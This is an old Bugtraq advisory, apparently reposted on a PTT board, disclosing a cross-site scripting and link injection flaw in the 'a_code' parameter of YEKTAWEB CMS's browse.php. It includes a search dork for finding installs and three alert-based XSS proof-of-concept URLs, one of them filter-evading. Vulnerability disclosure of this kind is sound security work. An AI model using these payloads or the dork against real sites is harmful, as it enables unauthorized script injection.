YEKTAWEB CMS XSS Vulnerability

看板Bugtraq作者時間15年前 (2010/12/30 02:01), 編輯推噓0(000)
留言0則, 0人參與, 最新討論串1/1
================= IUT-CERT ================= Title: YEKTAWEB CMS XSS Vulnerability Vendor: www.yektaweb.com Dork: Powered by Academic Web Tools ( AWT ) - Yektaweb Collection Type: Input.Validation.Vulnerability (cross-Site scripting) Fix: N/A ================== nsec.ir ================= Description: -------------------------------------------- YEKTAWEB is an Academic web tool. "browse.php" pages in this CMS is vulnerable to xss and link injection. Vulnerability Variant: --------------------------------------------- XSS: "browse.php" in "a_code" parameter. &sid=1&slc_lang=fa" rel="nofollow">http://www.example.com/browse.php?a_code="></IFRAME><script>alert(12345)</script>&sid=1&slc_lang=fa http://www.example.com/browse.php?a_code=1<iframe/+/onload=alert(12345)></iframe>. http://www.example.com/browse.php?a_code=1>"><ScRiPt %0A%0D>alert(12345)%3B</ScRiPt>. Solution: --------------------------------------------- Input validation of Parameter "a_code" should be corrected. Credit: --------------------------------------------- Isfahan University of Technology - Computer Emergency Response Team Thanks to : N. Fathi, M. R. Faghani
文章代碼(AID): #1D6tTXBU (Bugtraq)